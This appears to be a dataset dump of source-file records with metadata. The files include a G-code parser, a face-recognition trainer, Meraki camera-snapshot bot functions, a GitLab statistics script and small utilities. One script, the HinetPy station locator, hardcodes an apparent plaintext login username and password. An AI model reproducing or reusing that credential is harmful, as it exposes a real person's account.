blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
17b2acb4b4f0a5b2fb15b6f6cb0c5a4b028b87ae
|
13b8e4ccdf73c741fbe0522ffb648eee89b9a3ad
|
/modifiers/trans.py
|
64bbd0fd6cb1ce7306ca21b7fcd101179fa3d4a3
|
[] |
no_license
|
cyborgizator/pyced
|
6c5111ee2e1acdc1c09cca736cd57056aa5fcc0e
|
6f828fefb6a44f25f1d9a3a10ea69d37c6e81050
|
refs/heads/master
| 2021-01-17T15:30:22.756153
| 2016-03-27T20:43:03
| 2016-03-27T20:43:03
| 8,270,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
__author__ = 'Alexey Bright'
from modifiers.modifier import Modifier
class Trans(Modifier):
""" Represents trans-bond """
names = {'trans'}
def apply(self):
""" Applies modifier to the molecular graph """
pass
|
[
"cyborgizator@gmail.com"
] |
cyborgizator@gmail.com
|
8f0b720310ac0d2db3f03f90e334dc1fc3f57a2c
|
57a01e30fe44b5778a2da5c38da5fd6383162da5
|
/src/com/framework/utils/fileutils/ZipUtil.py
|
c48ef9bd1342e06fe391f4c81336c632577cbcdc
|
[
"Apache-2.0"
] |
permissive
|
chen5669/AppiumTestProject
|
b7577a8791dafa03581c5a0c93bce006e6a71a50
|
9ce7a552532193e8571c99148e452804b60e26d3
|
refs/heads/master
| 2021-09-01T12:38:12.314489
| 2017-12-27T02:15:20
| 2017-12-27T02:15:20
| 115,418,225
| 1
| 0
| null | 2017-12-27T02:15:21
| 2017-12-26T11:57:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,424
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@version: python2.7
@author: ‘jayzhen‘
@contact: jayzhen_testing@163.com
@site: https://github.com/gitjayzhen
@software: PyCharm Community Edition
@time: 2017/3/29 13:12
"""
import os
import ZipUtil
#解压zip文件
def unzip():
source_zip = "c:\\update\\SW_Servers_20120815.zip"
target_dir = "c:\\update\\"
myzip = ZipUtil(source_zip)
myfilelist=myzip.namelist()
for name in myfilelist:
f_handle=open(target_dir+name,"wb")
f_handle.write(myzip.read(name))
f_handle.close()
myzip.close()
#添加文件到已有的zip包中
def addzip(currentfolder,ready2compression):
zipfname = "AutoTesting-Reports.zip"
absZIPpath = os.path.join(currentfolder,zipfname)
absfpath = os.path.join(currentfolder,ready2compression)
f = ZipUtil.ZipFile(absZIPpath, 'w', ZipUtil.ZIP_DEFLATED)
f.write(absfpath)
f.close()
return absZIPpath,zipfname
#把整个文件夹内的文件打包
def adddirfile():
f = ZipUtil.ZipFile('archive.zip', 'w', ZipUtil.ZIP_DEFLATED)
startdir = "c:\\mydirectory"
for dirpath, dirnames, filenames in os.walk(startdir):
for filename in filenames:
f.write(os.path.join(dirpath,filename))
f.close()
#latestfpath,fname,currentfolder= FileChecK().get_LatestFile()
#absZIPpath,zipfname = addzip(currentfolder,fname)
|
[
"jayzhen_testing@163.com"
] |
jayzhen_testing@163.com
|
56800e9081ae660230ca1cdde52125e003561ae2
|
9a952ad4a7b0fff5a42b7e232e61980dd73f49a7
|
/CuraSlicer/gcodeInterpreter.py
|
9ad0bf2203090f096e84f50c02be7ec524e4c4d9
|
[] |
no_license
|
shoz/CuraSlicer
|
28f333621ae028530d1be92d389b42d895876b21
|
a50206e01920123c745ef24968a0d4dd40f49f3a
|
refs/heads/master
| 2021-01-15T18:58:17.614221
| 2015-06-28T10:32:19
| 2015-06-28T10:32:19
| 37,811,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,953
|
py
|
"""
The GCodeInterpreter module generates layer information from GCode.
It does this by parsing the whole GCode file. On large files this can take a while and should be used from a thread.
"""
__copyright__ = "Copyright (C) 2013 David Braam - Released under terms of the AGPLv3 License"
import sys
import math
import os
import time
import numpy
import types
import cStringIO as StringIO
from CuraSlicer import profile
def gcodePath(newType, pathType, layerThickness, startPoint):
"""
Build a gcodePath object. This used to be objects, however, this code is timing sensitive and dictionaries proved to be faster.
"""
if layerThickness <= 0.0:
layerThickness = 0.01
if profile.getProfileSetting('spiralize') == 'True':
layerThickness = profile.getProfileSettingFloat('layer_height')
return {'type': newType,
'pathType': pathType,
'layerThickness': layerThickness,
'points': [startPoint],
'extrusion': [0.0]}
class gcode(object):
"""
The heavy lifting GCode parser. This is most likely the hardest working python code in Cura.
It parses a GCode file and stores the result in layers where each layer as paths that describe the GCode.
"""
def __init__(self):
self.regMatch = {}
self.layerList = None
self.extrusionAmount = 0
self.filename = None
self.progressCallback = None
def load(self, data):
self.filename = None
if type(data) in types.StringTypes and os.path.isfile(data):
self.filename = data
self._fileSize = os.stat(data).st_size
gcodeFile = open(data, 'r')
self._load(gcodeFile)
gcodeFile.close()
elif type(data) is list:
self._load(data)
else:
self._fileSize = len(data)
data.seekStart()
self._load(data)
def calculateWeight(self):
#Calculates the weight of the filament in kg
radius = float(profile.getProfileSetting('filament_diameter')) / 2
volumeM3 = (self.extrusionAmount * (math.pi * radius * radius)) / (1000*1000*1000)
return volumeM3 * profile.getPreferenceFloat('filament_physical_density')
def calculateCost(self):
cost_kg = profile.getPreferenceFloat('filament_cost_kg')
cost_meter = profile.getPreferenceFloat('filament_cost_meter')
if cost_kg > 0.0 and cost_meter > 0.0:
return "%.2f / %.2f" % (self.calculateWeight() * cost_kg, self.extrusionAmount / 1000 * cost_meter)
elif cost_kg > 0.0:
return "%.2f" % (self.calculateWeight() * cost_kg)
elif cost_meter > 0.0:
return "%.2f" % (self.extrusionAmount / 1000 * cost_meter)
return None
def _load(self, gcodeFile):
self.layerList = []
pos = [0.0,0.0,0.0]
posOffset = [0.0, 0.0, 0.0]
currentE = 0.0
currentExtruder = 0
extrudeAmountMultiply = 1.0
absoluteE = True
scale = 1.0
posAbs = True
feedRate = 3600.0
moveType = 'move'
layerThickness = 0.1
pathType = 'CUSTOM'
currentLayer = []
currentPath = gcodePath('move', pathType, layerThickness, pos)
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
for line in gcodeFile:
if type(line) is tuple:
line = line[0]
#Parse Cura_SF comments
if line.startswith(';TYPE:'):
pathType = line[6:].strip()
if ';' in line:
comment = line[line.find(';')+1:].strip()
#Slic3r GCode comment parser
if comment == 'fill':
pathType = 'FILL'
elif comment == 'perimeter':
pathType = 'WALL-INNER'
elif comment == 'skirt':
pathType = 'SKIRT'
#Cura layer comments.
if comment.startswith('LAYER:'):
currentPath = gcodePath(moveType, pathType, layerThickness, currentPath['points'][-1])
layerThickness = 0.0
currentPath['extruder'] = currentExtruder
for path in currentLayer:
path['points'] = numpy.array(path['points'], numpy.float32)
path['extrusion'] = numpy.array(path['extrusion'], numpy.float32)
self.layerList.append(currentLayer)
if self.progressCallback is not None:
if self.progressCallback(float(gcodeFile.tell()) / float(self._fileSize)):
#Abort the loading, we can safely return as the results here will be discarded
gcodeFile.close()
return
currentLayer = [currentPath]
line = line[0:line.find(';')]
G = getCodeInt(line, 'G')
if G is not None:
if G == 0 or G == 1: #Move
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
e = getCodeFloat(line, 'E')
#f = getCodeFloat(line, 'F')
oldPos = pos
pos = pos[:]
if posAbs:
if x is not None:
pos[0] = x * scale + posOffset[0]
if y is not None:
pos[1] = y * scale + posOffset[1]
if z is not None:
pos[2] = z * scale + posOffset[2]
else:
if x is not None:
pos[0] += x * scale
if y is not None:
pos[1] += y * scale
if z is not None:
pos[2] += z * scale
moveType = 'move'
if e is not None:
if absoluteE and posAbs:
e -= currentE
if e > 0.0:
moveType = 'extrude'
if e < 0.0:
moveType = 'retract'
currentE += e
else:
e = 0.0
if moveType == 'move' and oldPos[2] != pos[2]:
if oldPos[2] > pos[2] and abs(oldPos[2] - pos[2]) > 5.0 and pos[2] < 1.0:
oldPos[2] = 0.0
if layerThickness == 0.0:
layerThickness = abs(oldPos[2] - pos[2])
if currentPath['type'] != moveType or currentPath['pathType'] != pathType:
currentPath = gcodePath(moveType, pathType, layerThickness, currentPath['points'][-1])
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
currentPath['points'].append(pos)
currentPath['extrusion'].append(e * extrudeAmountMultiply)
elif G == 4: #Delay
S = getCodeFloat(line, 'S')
P = getCodeFloat(line, 'P')
elif G == 10: #Retract
currentPath = gcodePath('retract', pathType, layerThickness, currentPath['points'][-1])
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
currentPath['points'].append(currentPath['points'][0])
elif G == 11: #Push back after retract
pass
elif G == 20: #Units are inches
scale = 25.4
elif G == 21: #Units are mm
scale = 1.0
elif G == 28: #Home
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
center = [0.0,0.0,0.0]
if x is None and y is None and z is None:
pos = center
else:
pos = pos[:]
if x is not None:
pos[0] = center[0]
if y is not None:
pos[1] = center[1]
if z is not None:
pos[2] = center[2]
elif G == 90: #Absolute position
posAbs = True
elif G == 91: #Relative position
posAbs = False
elif G == 92:
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
e = getCodeFloat(line, 'E')
if e is not None:
currentE = e
#if x is not None:
# posOffset[0] = pos[0] - x
#if y is not None:
# posOffset[1] = pos[1] - y
#if z is not None:
# posOffset[2] = pos[2] - z
else:
print "Unknown G code:" + str(G)
else:
M = getCodeInt(line, 'M')
if M is not None:
if M == 0: #Message with possible wait (ignored)
pass
elif M == 1: #Message with possible wait (ignored)
pass
elif M == 25: #Stop SD printing
pass
elif M == 80: #Enable power supply
pass
elif M == 81: #Suicide/disable power supply
pass
elif M == 82: #Absolute E
absoluteE = True
elif M == 83: #Relative E
absoluteE = False
elif M == 84: #Disable step drivers
pass
elif M == 92: #Set steps per unit
pass
elif M == 101: #Enable extruder
pass
elif M == 103: #Disable extruder
pass
elif M == 104: #Set temperature, no wait
pass
elif M == 105: #Get temperature
pass
elif M == 106: #Enable fan
pass
elif M == 107: #Disable fan
pass
elif M == 108: #Extruder RPM (these should not be in the final GCode, but they are)
pass
elif M == 109: #Set temperature, wait
pass
elif M == 110: #Reset N counter
pass
elif M == 113: #Extruder PWM (these should not be in the final GCode, but they are)
pass
elif M == 117: #LCD message
pass
elif M == 140: #Set bed temperature
pass
elif M == 190: #Set bed temperature & wait
pass
elif M == 221: #Extrude amount multiplier
s = getCodeFloat(line, 'S')
if s is not None:
extrudeAmountMultiply = s / 100.0
else:
print "Unknown M code:" + str(M)
else:
T = getCodeInt(line, 'T')
if T is not None:
if currentExtruder > 0:
posOffset[0] -= profile.getMachineSettingFloat('extruder_offset_x%d' % (currentExtruder))
posOffset[1] -= profile.getMachineSettingFloat('extruder_offset_y%d' % (currentExtruder))
currentExtruder = T
if currentExtruder > 0:
posOffset[0] += profile.getMachineSettingFloat('extruder_offset_x%d' % (currentExtruder))
posOffset[1] += profile.getMachineSettingFloat('extruder_offset_y%d' % (currentExtruder))
for path in currentLayer:
path['points'] = numpy.array(path['points'], numpy.float32)
path['extrusion'] = numpy.array(path['extrusion'], numpy.float32)
self.layerList.append(currentLayer)
if self.progressCallback is not None and self._fileSize > 0:
self.progressCallback(float(gcodeFile.tell()) / float(self._fileSize))
def getCodeInt(line, code):
n = line.find(code) + 1
if n < 1:
return None
m = line.find(' ', n)
try:
if m < 0:
return int(line[n:])
return int(line[n:m])
except:
return None
def getCodeFloat(line, code):
n = line.find(code) + 1
if n < 1:
return None
m = line.find(' ', n)
try:
if m < 0:
return float(line[n:])
return float(line[n:m])
except:
return None
if __name__ == '__main__':
t = time.time()
for filename in sys.argv[1:]:
g = gcode()
g.load(filename)
print time.time() - t
|
[
"shoji.ihara@gmail.com"
] |
shoji.ihara@gmail.com
|
500999b64b846913ee8eafb72d301d9641950d71
|
022fdec163db36b9dd3877ed4f27c1d85c094596
|
/src/pip/__init__.py
|
75df0357626461609395d037c9de004d53662bb2
|
[
"MIT"
] |
permissive
|
cade335/pip
|
d10cd892c43539fbf9ff12eac5cffdb3bfda5947
|
ddfa401dae5cdc473772f93951be2715e852681a
|
refs/heads/master
| 2020-06-17T10:52:53.480599
| 2019-07-08T20:19:43
| 2019-07-08T20:19:43
| 195,902,067
| 1
| 0
|
MIT
| 2019-07-09T00:06:31
| 2019-07-09T00:06:30
| null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
__version__ = "19.2.dev0"
|
[
"pradyunsg@gmail.com"
] |
pradyunsg@gmail.com
|
d474dc02fac9022280b7a674320f1a354a499e68
|
69a199830b2d6c99b2bb8a3007a001c363d80e4f
|
/5_训练数据.py
|
6983ba0f99e2281418cae2d188ce5654bab655d6
|
[] |
no_license
|
IronSpiderMan/FaceDetector
|
0285d0835061d31b78252ccf87cddac962e6dc84
|
ba658a0e8f38eeb02a97b17bb30ce79dd309f245
|
refs/heads/master
| 2020-12-15T12:24:59.578002
| 2020-01-20T13:03:29
| 2020-01-20T13:03:29
| 235,101,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
import cv2
import os
import numpy
# 人脸的根目录
root = './face/'
def getFacesAndLables():
# 用于存储人脸数据
faces = []
# 用于存储标签数据
labels = []
# 获取人脸检测器
face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
# 获取图片路径
files = os.listdir(root)
for file in files:
# 读取图像
im = cv2.imread(root + file)
# 灰度转换
grey = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
# 检测人脸
face = face_detector.detectMultiScale(grey)
for x, y, w, h in face:
# 设置标签
labels.append(int(file.split('.')[0]))
# 设置人脸数据
faces.append(grey[y:y+h, x:x+w])
return faces, labels
# 获取人脸数据和标签
faces, labels = getFacesAndLables()
# 获取训练对象
recognizer = cv2.face.LBPHFaceRecognizer_create()
# 训练数据
recognizer.train(faces, numpy.array(labels))
# 保存训练数据
recognizer.write('./trainer.yml')
|
[
"sockwz@163.com"
] |
sockwz@163.com
|
7f5649092f26f5102c6fa6dd446e1d3a8c4f6537
|
6f594cbe55ea146de86b0f82d4b4bd2cc716eb11
|
/migrations/versions/6451c45cc96d_.py
|
8134fd6c58f803c1666b1397dc7f2f8d5b48660b
|
[
"BSD-3-Clause"
] |
permissive
|
Rdbaker/WPI-IFC
|
428d4c8ae422e50364ca0b80aa7f410641c8bb03
|
23b39d57d8ab62bb0588590010a43bfbdaea2b36
|
refs/heads/master
| 2021-01-10T16:12:01.558306
| 2018-02-06T01:07:55
| 2018-02-06T01:07:55
| 54,286,220
| 0
| 1
| null | 2016-12-23T05:03:40
| 2016-03-19T20:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
"""Add parties references to the 'users' and 'fraternities'
Revision ID: 6451c45cc96d
Revises: e2200226cabc
Create Date: 2016-04-15 19:15:32.280974
"""
# revision identifiers, used by Alembic.
revision = '6451c45cc96d'
down_revision = 'e2200226cabc'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('parties', sa.Column('creator_id', sa.Integer(), nullable=False))
op.add_column('parties', sa.Column('fraternity_id', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'parties', 'users', ['creator_id'], ['id'])
op.create_foreign_key(None, 'parties', 'fraternities', ['fraternity_id'], ['id'])
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'parties', type_='foreignkey')
op.drop_constraint(None, 'parties', type_='foreignkey')
op.drop_column('parties', 'fraternity_id')
op.drop_column('parties', 'creator_id')
### end Alembic commands ###
|
[
"ryan.da.baker@gmail.com"
] |
ryan.da.baker@gmail.com
|
71464f9990bdf5bbe65c7df13109d356523a17e2
|
8e92aa8428a9c4321d98852a19b52fb0eec07850
|
/python/abc/abc215/abc215d.py
|
0fcd849683e13b4a329faccda071fe051b5db3d7
|
[] |
no_license
|
t-chov/algorithm_and_data_structure
|
ad71a4aa7a85698081fc428566125d8adff6463b
|
e1dab899e76539fda7e5271b8f6b1927b82e152a
|
refs/heads/main
| 2023-08-17T01:33:53.355280
| 2021-09-12T07:15:46
| 2021-09-12T07:15:46
| 373,989,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
from math import sqrt
def prime_factorize(n: int):
"""素因数分解"""
s = int(sqrt(n))
r = 0
primes = []
for i in range(2, s + 1):
if n % i == 0:
r = 0
while n % i == 0:
r += 1
n = n // i
primes.append((i, r))
if n > s:
primes.append((n, 1))
return primes
N, M = map(int, input().split())
k = { i: True for i in range(1, M + 1)}
A = set(map(int, input().split()))
memo = set()
for a in A:
primes = prime_factorize(a)
for p in primes:
pp = p[0]
if pp in memo: continue
memo.add(pp)
for i in range(1, M // pp + 1):
k[pp * i] = False
ans = [i for i in k.keys() if k[i] == True]
print(len(ans))
for a in ans:
print(a)
|
[
"kotsuyuki@gmail.com"
] |
kotsuyuki@gmail.com
|
852f3ca9df527b3b9480c1a93e71c8d44bf424fa
|
c3d348e5d3a85034afc360a617a88b803f1067fa
|
/python/a.py
|
c5b75bfb0c7b62ee26f06e0f803df41c8ebd6a51
|
[] |
no_license
|
Gupta-Akshit/Firsttime
|
d5be966ff0a97abdd8c3baa2b1c167368e207c11
|
509009aa727a7bc3182aaa9d81548d815bf661d5
|
refs/heads/master
| 2021-05-02T10:36:44.066565
| 2018-02-08T13:21:09
| 2018-02-08T13:21:09
| 120,760,238
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22
|
py
|
print("hello People")
|
[
"akshit.gupta.cool@gmail.com"
] |
akshit.gupta.cool@gmail.com
|
1473ee68499fd09e1f265bb3e9d73d5ae37b9718
|
09c3d83aa8aa0c05af518b2131800f45d3255541
|
/snapshot.py
|
3ea8b29456685779365c2108655636d1801449b3
|
[
"MIT"
] |
permissive
|
receronp/meraki_bot
|
9cfcbc252f766eeb41755d555c5fc1596dbb1e17
|
9c7a9379184a18961309b9ed1b13a8031e5a290d
|
refs/heads/main
| 2023-08-27T18:50:10.504515
| 2021-10-29T22:27:15
| 2021-10-29T22:27:15
| 422,692,134
| 0
| 0
| null | 2021-10-29T22:27:16
| 2021-10-29T19:31:43
|
Python
|
UTF-8
|
Python
| false
| false
| 7,915
|
py
|
from datetime import datetime
import pytz
import requests
from chatbot import *
from status import *
# List the devices in an organization
# https://api.meraki.com/api_docs#list-the-devices-in-an-organization
def get_org_devices(session, api_key, org_id):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
response = session.get(f'https://api.meraki.com/api/v0/organizations/{org_id}/devices', headers=headers)
return response.json()
# Returns video link to the specified camera. If a timestamp is supplied, it links to that timestamp.
# https://api.meraki.com/api_docs#returns-video-link-to-the-specified-camera
def get_video_link(api_key, net_id, serial, timestamp=None, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
if timestamp:
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/videoLink?timestamp={timestamp}',
headers=headers
)
else:
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/videoLink',
headers=headers
)
if response.ok:
video_link = response.json()['url']
return video_link
else:
return None
# Generate a snapshot of what the camera sees at the specified time and return a link to that image.
# https://api.meraki.com/api_docs#generate-a-snapshot-of-what-the-camera-sees-at-the-specified-time-and-return-a-link-to-that-image
def generate_snapshot(api_key, net_id, serial, timestamp=None, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
if timestamp:
response = session.post(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/snapshot',
headers=headers,
json={'timestamp': timestamp}
)
else:
response = session.post(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/snapshot',
headers=headers
)
if response.ok:
snapshot_link = response.json()['url']
return snapshot_link
else:
return None
# List the devices in a network
# https://api.meraki.com/api_docs#list-the-devices-in-a-network
def get_network_devices(api_key, net_id, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/devices',
headers=headers
)
if response.ok:
return response.json()
else:
return None
# Return a network
# https://api.meraki.com/api_docs#return-a-network
def get_network(api_key, net_id, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}',
headers=headers
)
if response.ok:
return response.json()
else:
return None
# Retrieve cameras' snapshots, links to video, and timestamps in local time zone
def meraki_snapshots(session, api_key, timestamp=None, cameras=None):
# Temporarily store mappings of networks to their time zones
network_times = {}
# Assemble return data
snapshots = []
for camera in cameras:
net_id = camera['networkId']
serial = camera['serial']
cam_name = camera['name'] if 'name' in camera and camera['name'] else serial
# Get time zone
if net_id not in network_times:
time_zone = get_network(api_key, net_id, session)['timeZone']
network_times[net_id] = time_zone
else:
time_zone = network_times[net_id]
# Get video link
video_link = get_video_link(api_key, net_id, serial, timestamp, session)
# Get snapshot link
snapshot_link = generate_snapshot(api_key, net_id, serial, timestamp, session)
# Add timestamp to file name
if not timestamp:
utc_now = pytz.utc.localize(datetime.utcnow())
local_now = utc_now.astimezone(pytz.timezone(time_zone))
file_name = cam_name + ' - ' + local_now.strftime('%Y-%m-%d_%H-%M-%S')
else:
file_name = cam_name
# Add to list of snapshots to send
snapshots.append((cam_name, file_name, snapshot_link, video_link))
return snapshots
# Determine whether to retrieve all cameras or just selected snapshots
def return_snapshots(session, headers, payload, api_key, org_id, message, labels):
try:
# Get org's devices
devices = get_org_devices(session, api_key, org_id)
cameras = [d for d in devices if d['model'][:2] == 'MV']
statuses = get_device_statuses(session, api_key, org_id)
online = [d['serial'] for d in statuses if d['status'] == 'online']
# All cameras in the org that are online
if message_contains(message, ['all', 'complete', 'entire', 'every', 'full']) or not labels:
post_message(session, headers, payload,
'📸 _Retrieving all cameras\' snapshots..._')
online_cams = []
for c in cameras:
if c['serial'] in online:
online_cams.append(c)
snapshots = meraki_snapshots(session, api_key, None, online_cams)
# Or just specified/filtered ones, skipping those that do not match filtered names/tags
elif message_contains(message, ['net']):
post_message(session, headers, payload,
'📷 _Retrieving camera snapshots..._')
filtered_cams = []
for c in cameras:
if 'name' in c and c['name'] in labels:
filtered_cams.append(c)
elif 'tags' in c and set(labels).intersection(c['tags'].split()):
filtered_cams.append(c)
snapshots = meraki_snapshots(session, api_key, None, filtered_cams)
else:
post_message(session, headers, payload,
'📷 _Retrieving camera snapshot..._')
cam = []
for c in cameras:
if 'name' in c and c['name'] in labels:
if message_contains(message, [c['name'].lower()]):
cam.append(c)
break
snapshots = meraki_snapshots(session, api_key, None, cam)
# Send cameras names with files (URLs)
for (cam_name, file_name, snapshot, video) in snapshots:
if snapshot:
temp_file = download_file(session, file_name, snapshot)
if temp_file:
# Send snapshot without analysis
send_file(session, headers, payload, f'[{cam_name}]({video})', temp_file, file_type='image/jpg')
# Send to computer vision API for analysis
pass
# Snapshot GET with URL did not return any image
else:
post_message(session, headers, payload,
f'GET error with retrieving snapshot for camera **{cam_name}**')
else:
# Snapshot POST was not successful in retrieving image URL
post_message(session, headers, payload,
f'POST error with requesting snapshot for camera **{cam_name}**')
except:
post_message(session, headers, payload,
'Does your API key have write access to the specified organization ID with cameras? 😳')
|
[
"receronp@gmail.com"
] |
receronp@gmail.com
|
d2f4d7328e9ba27c70e90e4189dccf707b288262
|
4d1a392efa56da53bc9d35946afca3f93b574deb
|
/GetGitlabDetails.py
|
ed94d126606cbc366c493f23e9ece2b7bdcee2eb
|
[] |
no_license
|
vikramuk/PythonScripts
|
aa0f819ef3b8d6de7f9be6866d806c0496a2d00a
|
96d6fe661b02da7c1f4a5e9b6ddaa76d540e910b
|
refs/heads/master
| 2020-04-11T12:24:07.479525
| 2019-08-16T09:54:54
| 2019-08-16T09:54:54
| 161,778,845
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import gitlab, os, sys
import logging
import requests, json, time,urllib
from requests.models import PreparedRequest
#https://stackoverflow.com/questions/2506379/add-params-to-given-url-in-python
headers = {
'PRIVATE_TOKEN': '',
}
param2 = (
('private_token', ''),
('statistics', 'true'),
)
def GetDetails(projectid):
prjID=projectid #.rstrip('\n')
getProjectStatistics(prjID)
getProjectBranches(prjID)
getProjectCommits(prjID)
def getProjectBranches(prjID):
#print ("Am in Branch")
URL='https://gitlab.com/api/v4/projects/'+prjID+'/repository/branches'
r = requests.get(URL, headers=headers)
#print (URL)
data = r.json()
if (r.status_code==200):
data = r.json()
print (data[0]['name'],data[0]['commit']['id'])
for branches in data:
BranchName =branches['name']
BranchID = branches['commit']['short_id']
CommitterEmail = branches['commit']['committer_email']
print("BranchName:%s\t BranchID:%s\t BranchCommitter:%s " %(BranchName, BranchID,CommitterEmail))
def getProjectCommits(prjID):
#print ("Am in Commits")
URL='https://gitlab.com/api/v4/projects/'+prjID+'/repository/commits'
r = requests.get(URL, headers=headers)
data = r.json()
if (r.status_code == 200):
CommitID=data[0]['id']
shortID=data[0]['short_id']
Commiter=data[0]['committer_name']
print("CommitName:%s\t CommitID:%s\t Commiter:%s \n" %(CommitID, shortID,Commiter))
for commit in data:
commmitName =commit['id']
commitID = commit['short_id']
CommitterEmail = commit['committer_email']
print("CommitName:%s\t CommitID:%s\t CommitCommitter:%s " %(commmitName, commitID,CommitterEmail))
def getProjectStatistics(prjID):
#print ("Am in Statistics")
URL='https://gitlab.com/api/v4/projects/'+prjID
r = requests.get(URL, params=param2)
data = r.json()
if (r.status_code == 200):
data = r.json()
ProjectID =prjID
ProjectName =data['name']
ProjectNameSpace=data['name_with_namespace']
DefBranch=data['default_branch']
SSHRepo=data['ssh_url_to_repo']
IssueCount=data['open_issues_count']
CommitCount=data['statistics']['commit_count']
Filesize=data['statistics']['storage_size']
Reposize=data['statistics']['repository_size']
print("ProjectID: %s \t ProjectName %s \t ProjectNameSpace %s \t DefBranch %s \t SSHRepo %s \t IssueCount:%s \t Commits:%s \t FileSize:%s\t RepoSize:%s \n" %(ProjectID,ProjectName,ProjectNameSpace,DefBranch,SSHRepo,IssueCount,CommitCount, Filesize,Reposize))
def GetProjectDetails():
try:
ProjectFile = open("C:\\Users\\vikram.uk\\Desktop\\ProjectList.txt", "r")
with open("C:\\Users\\vikram.uk\\Desktop\\ProjectList.txt") as f:
content = f.read().splitlines()
#print (content)
except:
print("List of Projects is Empty")
exit(0)
for projectid in content:
GetDetails(projectid)
#print (projectid)
if __name__ =="__main__":
GetProjectDetails()
|
[
"noreply@github.com"
] |
vikramuk.noreply@github.com
|
287079129a1d83cbb891aa1cfbcf0a2daf0564f8
|
07d71b9664f4cac4841455c9a5966cbc66b87ae9
|
/construction/wizard/__init__.py
|
954ce0e6246bfbb23bf83a01b132f5c6a1bbc827
|
[] |
no_license
|
benoitlavorata/egy-pt-ext
|
16bff0aed96722fc0b303581f9454b4f3be08383
|
f07913cf1180e6f4bb336276dfea7d6856a2ca4b
|
refs/heads/master
| 2023-02-04T09:04:16.288987
| 2020-12-25T20:57:50
| 2020-12-25T20:57:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
# -*- coding: utf-8 -*-
from . import project_user_subtask
from . import task_costing_invoice
from . import whatsapp_wizard
|
[
"ah.amen79@gmail.com"
] |
ah.amen79@gmail.com
|
dddc102451650e8c1246a72751a2e42c806265f0
|
5149eca42f04316a9a13ce1a6e1307cb70dd3fcc
|
/GainProb/Hinet_Gain/AveLocation.py
|
a734ad80d33c55b49b0935c5066d192cc2c7f3f2
|
[] |
no_license
|
VioletaSeo/earthquake
|
f720d6d33d78c6e7d1b1661e36f64bdf6a90d0da
|
1527b2b40cb8f7de3169ede1f1f2807b8616305c
|
refs/heads/master
| 2020-09-12T00:38:57.133971
| 2020-04-03T08:57:30
| 2020-04-03T08:57:30
| 222,243,668
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
# Compute the average location of all HiNet stations (latitude, longitude) in degrees
from HinetPy import Client
client=Client("msseo97", "minseong97") # User login
stations = client.get_station_list('0101') # Get all the station info of HiNet
lat_sum, long_sum, count=0, 0, 0
for station in stations:
lat_sum += station.latitude
long_sum += station.longitude
count += 1
print(station)
lat_ave=lat_sum / count
long_ave=long_sum / count
print(f"Average Latitude: {lat_ave}")
print(f"Average Longitude: {long_ave}")
|
[
"noreply@github.com"
] |
VioletaSeo.noreply@github.com
|
1382f7c73719abbbf5b4fc5626130b4d4276b793
|
3e04762874f7284bf28073794b0aa4741b3bb5d7
|
